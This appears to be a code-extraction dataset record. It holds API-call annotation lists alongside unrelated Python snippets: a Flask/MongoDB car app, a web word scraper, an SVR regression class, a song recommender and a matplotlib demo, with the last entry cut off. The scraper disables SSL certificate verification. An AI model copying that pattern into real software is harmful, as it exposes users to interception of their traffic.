'(self.exp_folder_output, self.fold_test)\n', (36751, 36791), False, 'import os\n'), ((36911, 36956), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""training.log"""'], {}), "(exp_folder_fold, 'training.log')\n", (36923, 36956), False, 'import os\n'), ((36984, 37052), 'os.path.join', 'os.path.join', (['self.exp_folder_input', 'self.fold_test', '"""scaler.pickle"""'], {}), "(self.exp_folder_input, self.fold_test, 'scaler.pickle')\n", (36996, 37052), False, 'import os\n'), ((37777, 37801), 'dcase_models.util.files.load_pickle', 'load_pickle', (['scaler_path'], {}), '(scaler_path)\n', (37788, 37801), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((38845, 38899), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""data_instances.pickle"""'], {}), "(exp_folder_fold, 'data_instances.pickle')\n", (38857, 38899), False, 'import os\n'), ((38930, 38980), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""prototypes.pickle"""'], {}), "(exp_folder_fold, 'prototypes.pickle')\n", (38942, 38980), False, 'import os\n'), ((40123, 40184), 'os.path.join', 'os.path.join', (['self.exp_folder_output', '"""data_instances.pickle"""'], {}), "(self.exp_folder_output, 'data_instances.pickle')\n", (40135, 40184), False, 'import os\n'), ((40215, 40272), 'os.path.join', 'os.path.join', (['self.exp_folder_output', '"""prototypes.pickle"""'], {}), "(self.exp_folder_output, 'prototypes.pickle')\n", (40227, 40272), False, 'import os\n'), ((40286, 40376), 'dcase_models.util.files.save_pickle', 'save_pickle', (['self.model_containers[self.fold_test].data_instances', 'data_instances_path'], {}), '(self.model_containers[self.fold_test].data_instances,\n data_instances_path)\n', (40297, 40376), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((40385, 40463), 'dcase_models.util.files.save_pickle', 'save_pickle', (['self.model_containers[self.fold_test].prototypes', 'prototypes_path'], {}), 
'(self.model_containers[self.fold_test].prototypes, prototypes_path)\n', (40396, 40463), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((22556, 22587), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': '[selected]', 'y': '[1]'}), '(x=[selected], y=[1])\n', (22566, 22587), True, 'import plotly.graph_objects as go\n'), ((26410, 26428), 'numpy.amin', 'np.amin', (['dist_data'], {}), '(dist_data)\n', (26417, 26428), True, 'import numpy as np\n'), ((26432, 26452), 'numpy.amin', 'np.amin', (['dist_protos'], {}), '(dist_protos)\n', (26439, 26452), True, 'import numpy as np\n'), ((26499, 26519), 'numpy.argmin', 'np.argmin', (['dist_data'], {}), '(dist_data)\n', (26508, 26519), True, 'import numpy as np\n'), ((26905, 26935), 'librosa.core.load', 'librosa.core.load', (['center_file'], {}), '(center_file)\n', (26922, 26935), False, 'import librosa\n'), ((27240, 27262), 'numpy.argmin', 'np.argmin', (['dist_protos'], {}), '(dist_protos)\n', (27249, 27262), True, 'import numpy as np\n'), ((38257, 38307), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""best_weights.hdf5"""'], {}), "(exp_folder_fold, 'best_weights.hdf5')\n", (38269, 38307), False, 'import os\n'), ((39304, 39367), 'os.path.join', 'os.path.join', (["params_dataset['feature_folder']", '"""mel_basis.npy"""'], {}), "(params_dataset['feature_folder'], 'mel_basis.npy')\n", (39316, 39367), False, 'import os\n'), ((7263, 7298), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar Chart"""'}), "(text='A Bar Chart')\n", (7278, 7298), True, 'import plotly.graph_objects as go\n'), ((7813, 7841), 'numpy.array', 'np.array', (['prototypes_classes'], {}), '(prototypes_classes)\n', (7821, 7841), True, 'import numpy as np\n'), ((8596, 8631), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar Chart"""'}), "(text='A Bar Chart')\n", (8611, 8631), True, 'import plotly.graph_objects as go\n'), ((18775, 18926), 
'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x[j]', 'y': 'y[j]', 'text': 'classes[j]', 'name': 'self.label_list[j]', 'mode': '"""markers"""', 'marker': "{'size': size, 'symbol': 'cross', 'color': colors[j]}"}), "(x=x[j], y=y[j], text=classes[j], name=self.label_list[j], mode=\n 'markers', marker={'size': size, 'symbol': 'cross', 'color': colors[j]})\n", (18785, 18926), True, 'import plotly.graph_objects as go\n'), ((18962, 19147), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x_centers[j][:s]', 'y': 'y_centers[j][:s]', 'text': 'classes_centers[j][:s]', 'name': 'self.label_list[j]', 'mode': '"""markers"""', 'marker': "{'size': 6, 'color': colors[j], 'opacity': 0.7}"}), "(x=x_centers[j][:s], y=y_centers[j][:s], text=classes_centers[j][\n :s], name=self.label_list[j], mode='markers', marker={'size': 6,\n 'color': colors[j], 'opacity': 0.7})\n", (18972, 19147), True, 'import plotly.graph_objects as go\n'), ((19559, 19747), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x[j]', 'y': 'y[j]', 'text': 'classes[j]', 'name': 'self.label_list[j]', 'mode': '"""markers"""', 'selectedpoints': 'selectedpoints_j', 'marker': "{'size': size, 'symbol': 'cross', 'color': colors[j]}"}), "(x=x[j], y=y[j], text=classes[j], name=self.label_list[j], mode=\n 'markers', selectedpoints=selectedpoints_j, marker={'size': size,\n 'symbol': 'cross', 'color': colors[j]})\n", (19569, 19747), True, 'import plotly.graph_objects as go\n'), ((19778, 19983), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x_centers[j][:s]', 'y': 'y_centers[j][:s]', 'text': 'classes_centers[j][:s]', 'name': 'self.label_list[j]', 'selectedpoints': '[]', 'mode': '"""markers"""', 'marker': "{'size': 6, 'color': colors[j], 'opacity': 0.7}"}), "(x=x_centers[j][:s], y=y_centers[j][:s], text=classes_centers[j][\n :s], name=self.label_list[j], selectedpoints=[], mode='markers', marker\n ={'size': 6, 'color': colors[j], 'opacity': 0.7})\n", (19788, 19983), True, 'import 
plotly.graph_objects as go\n'), ((24792, 24834), 'numpy.random.randint', 'np.random.randint', (['(0)', '(255)'], {'size': '(100, 100)'}), '(0, 255, size=(100, 100))\n', (24809, 24834), True, 'import numpy as np\n'), ((14504, 14634), 'dash_html_components.Div', 'html.Div', (['[x_select]'], {'className': '"""two columns"""', 'style': "{'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}"}), "([x_select], className='two columns', style={'display': 'flex',\n 'align-items': 'center', 'justify-content': 'center'})\n", (14512, 14634), True, 'import dash_html_components as html\n'), ((14647, 14777), 'dash_html_components.Div', 'html.Div', (['[y_select]'], {'className': '"""two columns"""', 'style': "{'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}"}), "([y_select], className='two columns', style={'display': 'flex',\n 'align-items': 'center', 'justify-content': 'center'})\n", (14655, 14777), True, 'import dash_html_components as html\n'), ((14790, 14928), 'dash_html_components.Div', 'html.Div', (['[slider_samples]'], {'className': '"""three columns"""', 'style': "{'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}"}), "([slider_samples], className='three columns', style={'display':\n 'flex', 'align-items': 'center', 'justify-content': 'center'})\n", (14798, 14928), True, 'import dash_html_components as html\n'), ((15092, 15162), 'dash_html_components.Div', 'html.Div', (['[plot2D]'], {'className': '"""nine columns"""', 'style': "{'height': '80vh'}"}), "([plot2D], className='nine columns', style={'height': '80vh'})\n", (15100, 15162), True, 'import dash_html_components as html\n'), ((15899, 15948), 'dash_html_components.Div', 'html.Div', (['[plot_weights]'], {'className': '"""six columns"""'}), "([plot_weights], className='six columns')\n", (15907, 15948), True, 'import dash_html_components as html\n'), ((22391, 22426), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar 
Chart"""'}), "(text='A Bar Chart')\n", (22406, 22426), True, 'import plotly.graph_objects as go\n'), ((22784, 22812), 'numpy.array', 'np.array', (['prototypes_classes'], {}), '(prototypes_classes)\n', (22792, 22812), True, 'import numpy as np\n'), ((23628, 23663), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar Chart"""'}), "(text='A Bar Chart')\n", (23643, 23663), True, 'import plotly.graph_objects as go\n'), ((27019, 27041), 'dcase_models.util.gui.encode_audio', 'encode_audio', (['data', 'sr'], {}), '(data, sr)\n', (27031, 27041), False, 'from dcase_models.util.gui import encode_audio\n'), ((27661, 27713), 'dcase_models.util.gui.encode_audio', 'encode_audio', (["proto_audio['data']", "proto_audio['sr']"], {}), "(proto_audio['data'], proto_audio['sr'])\n", (27673, 27713), False, 'from dcase_models.util.gui import encode_audio\n'), ((15198, 15207), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15205, 15207), True, 'import dash_html_components as html\n'), ((15214, 15223), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15221, 15223), True, 'import dash_html_components as html\n'), ((15238, 15247), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15245, 15247), True, 'import dash_html_components as html\n'), ((15260, 15269), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15267, 15269), True, 'import dash_html_components as html\n'), ((15282, 15291), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15289, 15291), True, 'import dash_html_components as html\n'), ((15304, 15313), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15311, 15313), True, 'import dash_html_components as html\n'), ((15356, 15365), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15363, 15365), True, 'import dash_html_components as html\n'), ((15379, 15388), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15386, 15388), True, 'import dash_html_components as html\n'), ((15399, 15408), 
'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15406, 15408), True, 'import dash_html_components as html\n'), ((15438, 15447), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15445, 15447), True, 'import dash_html_components as html\n'), ((15522, 15531), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15529, 15531), True, 'import dash_html_components as html\n'), ((15532, 15541), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15539, 15541), True, 'import dash_html_components as html\n')] |
import json
from flask import Flask, Response
from flask import render_template, request
from bson.json_util import dumps
from flask.ext.pymongo import PyMongo
# Flask application: static assets are served from the local "view" directory.
app = Flask( __name__,
    static_folder="view",
)
# Database name read by the Flask-PyMongo extension when it connects.
app.config['MONGO_DBNAME'] = 'cars_db'
mongo = PyMongo(app)
@app.route("/")
def home():
    """Serve the landing page."""
    page = 'index.html'
    return render_template(page)
@app.route("/cars")
def show_cars():
    """Serve the car-listing page."""
    page = 'cars.html'
    return render_template(page)
@app.route("/cars.json")
def cars_json():
    """Return every car document as a pretty-printed JSON response."""
    payload = dumps(mongo.db.cars.find(), indent=2, sort_keys=True)
    return Response(payload, mimetype='application/json')
@app.route("/cars/<marque>")
def show_marque(marque):
    """Render the page for a single marque."""
    return render_template('marque.html', context={'marque': marque})
@app.route("/cars/<marque>/<model>", methods=['GET', 'POST', 'DELETE'])
def model(marque, model):
    """Show (GET), delete (DELETE) or create (POST) a single car record."""
    car = {'marque': marque, 'model': model}
    method = request.method
    if method == 'GET':
        return render_template('model.html', context=car)
    if method == 'DELETE':
        # The trailing 1 limits the removal to a single matching document.
        mongo.db.cars.remove({'marque': car['marque'],
                              'model': car['model']}, 1)
        return ('Success', 205)
    if method == 'POST':
        posted = request.get_json()
        mongo.db.cars.insert_one({'marque': posted['marque'],
                                  'model': posted['model']})
        return ('Success', 201)
@app.route("/colophon")
def colophon():
    """Serve the colophon page."""
    page = 'colophon.html'
    return render_template(page)
if __name__ == "__main__":
app.run(
debug=True,
) | [
"flask.render_template",
"flask.Flask",
"flask.request.get_json",
"flask.Response",
"flask.ext.pymongo.PyMongo",
"bson.json_util.dumps"
] | [((167, 204), 'flask.Flask', 'Flask', (['__name__'], {'static_folder': '"""view"""'}), "(__name__, static_folder='view')\n", (172, 204), False, 'from flask import Flask, Response\n'), ((268, 280), 'flask.ext.pymongo.PyMongo', 'PyMongo', (['app'], {}), '(app)\n', (275, 280), False, 'from flask.ext.pymongo import PyMongo\n'), ((321, 350), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (336, 350), False, 'from flask import render_template, request\n'), ((401, 429), 'flask.render_template', 'render_template', (['"""cars.html"""'], {}), "('cars.html')\n", (416, 429), False, 'from flask import render_template, request\n'), ((525, 562), 'bson.json_util.dumps', 'dumps', (['cars'], {'indent': '(2)', 'sort_keys': '(True)'}), '(cars, indent=2, sort_keys=True)\n', (530, 562), False, 'from bson.json_util import dumps\n'), ((574, 626), 'flask.Response', 'Response', (['json_response'], {'mimetype': '"""application/json"""'}), "(json_response, mimetype='application/json')\n", (582, 626), False, 'from flask import Flask, Response\n'), ((742, 789), 'flask.render_template', 'render_template', (['"""marque.html"""'], {'context': 'context'}), "('marque.html', context=context)\n", (757, 789), False, 'from flask import render_template, request\n'), ((1503, 1535), 'flask.render_template', 'render_template', (['"""colophon.html"""'], {}), "('colophon.html')\n", (1518, 1535), False, 'from flask import render_template, request\n'), ((1005, 1047), 'flask.render_template', 'render_template', (['"""model.html"""'], {'context': 'car'}), "('model.html', context=car)\n", (1020, 1047), False, 'from flask import render_template, request\n'), ((1273, 1291), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1289, 1291), False, 'from flask import render_template, request\n')] |
import urllib.request, urllib.parse, urllib.error
# http://www.py4e.com/code3/bs4.zip
# and unzip it in the same directory as this file
from urllib.request import urlopen
import re
from bs4 import BeautifulSoup
import ssl
import sqlite3
# Harvest unique lower-cased words from crawled pages into the `dict` table.
conn = sqlite3.connect('wiki2.sqlite')
cur = conn.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS dict (
    word TEXT UNIQUE PRIMARY KEY
);
''')

# Ignore SSL certificate errors so pages with bad certificates can still be read.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# A token containing any of these substrings is discarded as junk
# (URLs, markup, digits, punctuation ...).
arr_junk = ['http:', 'https:', '/', '<', '>', '=', '1', '2', '3', '4', '5',
            '6', '7', '8', '9', '0', '\'', '"', '}', '{', ']', '[', '(', ')',
            ':', '-', '+', '!', '~', '|', '\\', '*', '?', ';', '_', '.', '#',
            '$', '@', '%', '^', '&', '`']

# NOTE(review): this script expects a pre-existing `data` table of crawl links,
# where flag = 1 means "queued" and flag = 2 means "done or failed".
processed = 0  # links handled so far; used for batched commits
for _ in range(100000):
    # fetchall() up front: re-using `cur` for UPDATE/INSERT inside the loop
    # would otherwise reset the cursor we are iterating over.
    queued = cur.execute(''' SELECT link FROM data where flag = ?''', (1,)).fetchall()
    for tlink in queued:
        link = ''.join(tlink)  # unpack the 1-tuple row into a plain string
        print(link)
        try:
            fhand = urllib.request.urlopen(link)
        except Exception:  # was a bare `except:`; keep the best-effort behaviour
            print("Sorry Link cannot be opened!", link)
            cur.execute('''UPDATE data SET flag = 2 WHERE link = ?''', (link,))
            continue
        print("Extracting words in the link .... : ", link)
        for line in fhand:
            for junk in line.decode().strip().split(' '):
                clean = True
                for needle in arr_junk:
                    if needle in junk:
                        clean = False
                        break  # was `continue`, which kept scanning needlessly
                if not clean:
                    continue
                # Keep only the text before a trailing comma, if any.
                ext_wrd = junk[:junk.find(',')] if ',' in junk else junk
                if ext_wrd != '':
                    word = ext_wrd.lower()
                    print(word)
                    cur.execute('''INSERT OR IGNORE INTO dict (word)
                        VALUES ( ? )''', (word,))
        cur.execute('''UPDATE data SET flag = 2 WHERE link = ?''', (link,))
        processed = processed + 1
        if processed % 20 == 0:
            conn.commit()  # commit in batches of 20 links
conn.commit()
| [
"ssl.create_default_context",
"sqlite3.connect"
] | [((248, 279), 'sqlite3.connect', 'sqlite3.connect', (['"""wiki2.sqlite"""'], {}), "('wiki2.sqlite')\n", (263, 279), False, 'import sqlite3\n'), ((524, 552), 'ssl.create_default_context', 'ssl.create_default_context', ([], {}), '()\n', (550, 552), False, 'import ssl\n')] |
'''
NPSN Support Vector Regression Class
'''
import os
from joblib import dump, load
# Base model
from .base import BaseModel
# Import for SVR
from sklearn.multioutput import MultiOutputRegressor as MOR
from sklearn.metrics import mean_squared_error as sklmse
from sklearn.svm import NuSVR
# hyperopt imports
from hyperopt import STATUS_OK
from hyperopt.hp import choice, quniform, uniform
class SVR(BaseModel):
    """Multi-output Nu-SVR regressor with hyperopt hyper-parameter search.

    Wraps sklearn's NuSVR in a MultiOutputRegressor so that a flattened
    power/flux distribution (one output per node) can be fitted, searched
    over with hyperopt, and saved/loaded together with the DataLoader
    settings kept in ``data_info``.
    """

    def __init__(self, *args):
        # With exactly 6 positional args, defer to BaseModel's full setup;
        # otherwise build an empty shell to be populated via load_model().
        self.model_nm = 'SVR'
        if len(args) == 6:
            super().__init__(*args)
        else:
            print("Empty {} initialized".format(self.model_nm))
        self.loaded_model = None             # set by load_model()
        self.file_ext = '.' + self.model_nm  # extension for saved files

    def train_model(self, params):
        '''
        Fit one SVR hyper-parameter combination and record its test loss.

        Input a dict, params, containing:
            nu: Float, fraction of support vectors (0,1]
            C: Float, penalty parameter of error (~1.0)
            kernel: String, 'linear', 'poly', 'rbf', 'sigmoid'
            degree: Int, degree of polynomial for poly
            gamma: String, 'scale'/'auto' for 'rbf', 'poly', 'sigmoid'
        Returns:
            Dict with the hyperopt loss and status for this combination
        Raises:
            ValueError: if params['kernel'] is not a supported kernel.
        '''
        kernel = params['kernel']
        nu = params['nu']
        C = params['C']
        # Instantiate a multi-output SVR appropriate for the kernel.
        if kernel in ['linear']:
            model = MOR(NuSVR(C=C, nu=nu, kernel=kernel))
        elif kernel in ['rbf', 'sigmoid']:
            gamma = params['gamma']
            model = MOR(NuSVR(C=C, nu=nu, kernel=kernel,
                              gamma=gamma))
        elif kernel in ['poly']:
            gamma = params['gamma']
            # hyperopt's quniform yields floats (e.g. 3.0); NuSVR wants an int.
            degree = int(params['degree'])
            model = MOR(NuSVR(C=C, nu=nu, kernel=kernel,
                              degree=degree, gamma=gamma))
        else:
            # Previously an unknown kernel fell through with `model` unbound.
            raise ValueError("Unsupported kernel '{}'".format(kernel))
        # Print current combination
        print('Current SVR combination: {}'.format(params))
        # Flat versions of y (power/flux distribution)
        y_tr_fl, y_te_fl = self.flat_y()
        # Fit
        model.fit(self.x_train, y_tr_fl)
        # Hyperopt loss for this combination: test-set MSE.
        y_predict = model.predict(self.x_test)
        hyp_loss = sklmse(y_te_fl, y_predict)
        self.tr_hist.update_history(params, hyp_loss, model)
        return {'loss': hyp_loss, 'status': STATUS_OK}

    def hpss_space(self):
        """Return the hyperopt search space: one branch per kernel type."""
        hpss = choice('kernel_type', [
            {
                'kernel': 'linear',
                'nu': uniform('nu_lin', 1e-5, 1),
                'C': uniform('C_lin', 0.5, 10.0),
            },
            {
                'kernel': 'poly',
                'nu': uniform('nu_poly', 1e-5, 1),
                'C': uniform('C_poly', 0.5, 10.0),
                'degree': quniform('degree_poly', 2, 5, 1),
                'gamma': choice('gamma_poly', ['scale', 'auto'])
            },
            {
                'kernel': 'rbf',
                'nu': uniform('nu_rbf', 1e-5, 1),
                'C': uniform('C_rbf', 0.5, 10.0),
                'gamma': choice('gamma_rbf', ['scale', 'auto'])
            },
            {
                'kernel': 'sigmoid',
                'nu': uniform('nu_sigmoid', 1e-5, 1),
                'C': uniform('C_sigmoid', 0.5, 10.0),
                'gamma': choice('gamma_sigmoid', ['scale', 'auto'])
            },
        ])
        return hpss

    def gen_trials(self, doGuess=False):
        """Delegate trial generation to BaseModel (no warm-start guess)."""
        return super().gen_trials()

    def save_model(self):
        '''
        Save the best SVR model together with the DataLoader settings.

        Raises:
            Exception: if no model has been trained yet.
        '''
        model = self.tr_hist.best_model
        if model is None:
            raise(Exception('Model not trained.'))
        pickle_dict = {
            'model': model,
            'data_info': self.data_info
        }
        # Serialize with joblib to <prj_nm>.SVR in the working directory.
        prj_nm = self.data_info['prj_nm']
        modelpath = os.path.join(os.getcwd(), prj_nm+self.file_ext)
        dump(pickle_dict, modelpath)

    def load_model(self, file_nm, inp_dict):
        '''
        Load a previously saved model file.

        Inputs:
            file_nm: String, name of saved file (must end with '.SVR')
            inp_dict: Dict, empty containing keys to be read
        Returns:
            inp_dict: Dict, filled for DataLoader
        Raises:
            Exception: if file_nm does not carry the expected extension.
        '''
        if file_nm[-len(self.file_ext):] != self.file_ext:
            raise(Exception('Wrong file_nm {}'.format(file_nm)))
        fpath = os.path.join(os.getcwd(), file_nm)
        try:
            loaded_dict = load(fpath)
        except Exception:
            # NOTE(review): on failure, data_info may be unset and the
            # return below will then raise AttributeError — confirm intent.
            print("Error loading {} model.".format(self.model_nm))
        else:
            self.loaded_model = loaded_dict['model']
            self.data_info = loaded_dict['data_info']
            print("{} loaded.".format(file_nm))
        return self.data_info

    def eval_model(self):
        '''
        Provides access to evaluate inputs.

        Returns:
            predict: Function, used to eval the loaded model
        Raises:
            Exception: if no model has been loaded.
        '''
        if self.loaded_model is None:
            raise(Exception('Model not loaded.'))
        # SVR predicts the flattened output; reshape back before returning.
        def predict(x_in):
            y_out = self.loaded_model.predict(x_in)
            return self.un_flat_y(y_out)
        return predict
| [
"hyperopt.hp.quniform",
"os.getcwd",
"sklearn.metrics.mean_squared_error",
"hyperopt.hp.uniform",
"hyperopt.hp.choice",
"joblib.load",
"sklearn.svm.NuSVR",
"joblib.dump"
] | [((2136, 2162), 'sklearn.metrics.mean_squared_error', 'sklmse', (['y_te_fl', 'y_predict'], {}), '(y_te_fl, y_predict)\n', (2142, 2162), True, 'from sklearn.metrics import mean_squared_error as sklmse\n'), ((3870, 3898), 'joblib.dump', 'dump', (['pickle_dict', 'modelpath'], {}), '(pickle_dict, modelpath)\n', (3874, 3898), False, 'from joblib import dump, load\n'), ((3827, 3838), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3836, 3838), False, 'import os\n'), ((4335, 4346), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4344, 4346), False, 'import os\n'), ((4396, 4407), 'joblib.load', 'load', (['fpath'], {}), '(fpath)\n', (4400, 4407), False, 'from joblib import dump, load\n'), ((1337, 1369), 'sklearn.svm.NuSVR', 'NuSVR', ([], {'C': 'C', 'nu': 'nu', 'kernel': 'kernel'}), '(C=C, nu=nu, kernel=kernel)\n', (1342, 1369), False, 'from sklearn.svm import NuSVR\n'), ((1474, 1519), 'sklearn.svm.NuSVR', 'NuSVR', ([], {'C': 'C', 'nu': 'nu', 'kernel': 'kernel', 'gamma': 'gamma'}), '(C=C, nu=nu, kernel=kernel, gamma=gamma)\n', (1479, 1519), False, 'from sklearn.svm import NuSVR\n'), ((2418, 2445), 'hyperopt.hp.uniform', 'uniform', (['"""nu_lin"""', '(1e-05)', '(1)'], {}), "('nu_lin', 1e-05, 1)\n", (2425, 2445), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2467, 2494), 'hyperopt.hp.uniform', 'uniform', (['"""C_lin"""', '(0.5)', '(10.0)'], {}), "('C_lin', 0.5, 10.0)\n", (2474, 2494), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2581, 2609), 'hyperopt.hp.uniform', 'uniform', (['"""nu_poly"""', '(1e-05)', '(1)'], {}), "('nu_poly', 1e-05, 1)\n", (2588, 2609), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2631, 2659), 'hyperopt.hp.uniform', 'uniform', (['"""C_poly"""', '(0.5)', '(10.0)'], {}), "('C_poly', 0.5, 10.0)\n", (2638, 2659), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2687, 2719), 'hyperopt.hp.quniform', 'quniform', (['"""degree_poly"""', '(2)', '(5)', '(1)'], {}), "('degree_poly', 2, 5, 1)\n", 
(2695, 2719), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2746, 2785), 'hyperopt.hp.choice', 'choice', (['"""gamma_poly"""', "['scale', 'auto']"], {}), "('gamma_poly', ['scale', 'auto'])\n", (2752, 2785), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2870, 2897), 'hyperopt.hp.uniform', 'uniform', (['"""nu_rbf"""', '(1e-05)', '(1)'], {}), "('nu_rbf', 1e-05, 1)\n", (2877, 2897), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2919, 2946), 'hyperopt.hp.uniform', 'uniform', (['"""C_rbf"""', '(0.5)', '(10.0)'], {}), "('C_rbf', 0.5, 10.0)\n", (2926, 2946), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2973, 3011), 'hyperopt.hp.choice', 'choice', (['"""gamma_rbf"""', "['scale', 'auto']"], {}), "('gamma_rbf', ['scale', 'auto'])\n", (2979, 3011), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((3100, 3131), 'hyperopt.hp.uniform', 'uniform', (['"""nu_sigmoid"""', '(1e-05)', '(1)'], {}), "('nu_sigmoid', 1e-05, 1)\n", (3107, 3131), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((3153, 3184), 'hyperopt.hp.uniform', 'uniform', (['"""C_sigmoid"""', '(0.5)', '(10.0)'], {}), "('C_sigmoid', 0.5, 10.0)\n", (3160, 3184), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((3211, 3253), 'hyperopt.hp.choice', 'choice', (['"""gamma_sigmoid"""', "['scale', 'auto']"], {}), "('gamma_sigmoid', ['scale', 'auto'])\n", (3217, 3253), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((1682, 1742), 'sklearn.svm.NuSVR', 'NuSVR', ([], {'C': 'C', 'nu': 'nu', 'kernel': 'kernel', 'degree': 'degree', 'gamma': 'gamma'}), '(C=C, nu=nu, kernel=kernel, degree=degree, gamma=gamma)\n', (1687, 1742), False, 'from sklearn.svm import NuSVR\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 22 09:00:08 2020
@author: SKD-HiTMAN
"""
import pandas as pd
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
# Build an item-item cosine-similarity matrix from MovieLens-style ratings.
ratings = pd.read_csv('../Dataset/MovieLens/ml-latest-small/ratings.csv')
songs = pd.read_csv('../Dataset/MovieLens/ml-latest-small/songs.csv', encoding='latin-1')
# Join ratings with titles on the shared songId column.
merged = pd.merge(ratings, songs, left_on='songId', right_on='songId', sort=True)
merged = merged[['userId', 'title', 'rating']]
# Pivot to a title x user matrix of ratings (NaN where a user did not rate).
songRatings = merged.pivot_table(index=['title'], columns=['userId'], values='rating')
# Replace missing ratings with 0 so cosine_similarity gets a dense matrix.
#songRatings.replace({np.nan:0}, regex=True, inplace=True)
songRatings = songRatings.fillna(0)
# Pairwise cosine similarity between all song rating vectors (rows).
item_similarity = cosine_similarity(songRatings)
# cosine_similarity returns a numpy array -> wrap it in a DataFrame so rows
# and columns are labelled by song title.
item_sim_df = pd.DataFrame(item_similarity, index = songRatings.index, columns = songRatings.index)
def sim_songs_to(title):
    """Print the ten songs most similar to *title* by cosine similarity.

    Ranks the module-level ``item_sim_df`` matrix by *title*'s column and
    prints the ten best matches (position 0 is the song itself, so it is
    skipped).
    """
    print('Similar songs to {} are: '.format(title))
    top_ten = item_sim_df.sort_values(by=title, ascending=False).index[1:11]
    for rank, song in enumerate(top_ten, start=1):
        print('No. {} : {}'.format(rank, song))
| [
"pandas.DataFrame",
"pandas.merge",
"sklearn.metrics.pairwise.cosine_similarity",
"pandas.read_csv"
] | [((208, 271), 'pandas.read_csv', 'pd.read_csv', (['"""../Dataset/MovieLens/ml-latest-small/ratings.csv"""'], {}), "('../Dataset/MovieLens/ml-latest-small/ratings.csv')\n", (219, 271), True, 'import pandas as pd\n'), ((281, 367), 'pandas.read_csv', 'pd.read_csv', (['"""../Dataset/MovieLens/ml-latest-small/songs.csv"""'], {'encoding': '"""latin-1"""'}), "('../Dataset/MovieLens/ml-latest-small/songs.csv', encoding=\n 'latin-1')\n", (292, 367), True, 'import pandas as pd\n'), ((375, 447), 'pandas.merge', 'pd.merge', (['ratings', 'songs'], {'left_on': '"""songId"""', 'right_on': '"""songId"""', 'sort': '(True)'}), "(ratings, songs, left_on='songId', right_on='songId', sort=True)\n", (383, 447), True, 'import pandas as pd\n'), ((820, 850), 'sklearn.metrics.pairwise.cosine_similarity', 'cosine_similarity', (['songRatings'], {}), '(songRatings)\n', (837, 850), False, 'from sklearn.metrics.pairwise import cosine_similarity\n'), ((964, 1050), 'pandas.DataFrame', 'pd.DataFrame', (['item_similarity'], {'index': 'songRatings.index', 'columns': 'songRatings.index'}), '(item_similarity, index=songRatings.index, columns=songRatings.\n index)\n', (976, 1050), True, 'import pandas as pd\n')] |
import numpy as np
import matplotlib.pyplot as plt
# pyplot API reference:
# https://matplotlib.org/3.1.3/api/pyplot_summary.html

# --- scatter plot ---
xs = np.random.randint(100, size=100)
ys = np.random.randint(100, size=100)
plt.scatter(xs, ys, c='tab:blue', label='stuff')
plt.legend(loc=2)
# plt.show()

# --- line plot ---
xs = np.arange(10, 101, 10)
ys = np.arange(10, 101, 10)
plt.plot(xs, ys, c='tab:green', label='aaa')
plt.plot(xs, ys, "-o", c='tab:green', label='aaa')  # same line, dot markers
# plt.show()

# --- bar chart ---
positions = np.arange(3)
plt.bar(positions, height=[1, 2, 3])
plt.xticks(positions, ['a', 'b', 'c'])
plt.ylabel('y')
plt.xlabel('x')
# plt.show()

# --- subplots: pie chart and histogram ---
pie_values = np.array([40, 30, 70])
pie_labels = ["a", "b", "c"]
hist_values = np.random.normal(size=1000)
fig1, panels = plt.subplots(2)
panels[0].pie(pie_values, labels=pie_labels)
panels[0].title.set_text("pie chart")
panels[1].hist(hist_values, bins=30)
panels[1].title.set_text("histogram")
# plt.show()
| [
"numpy.random.normal",
"matplotlib.pyplot.xticks",
"numpy.arange",
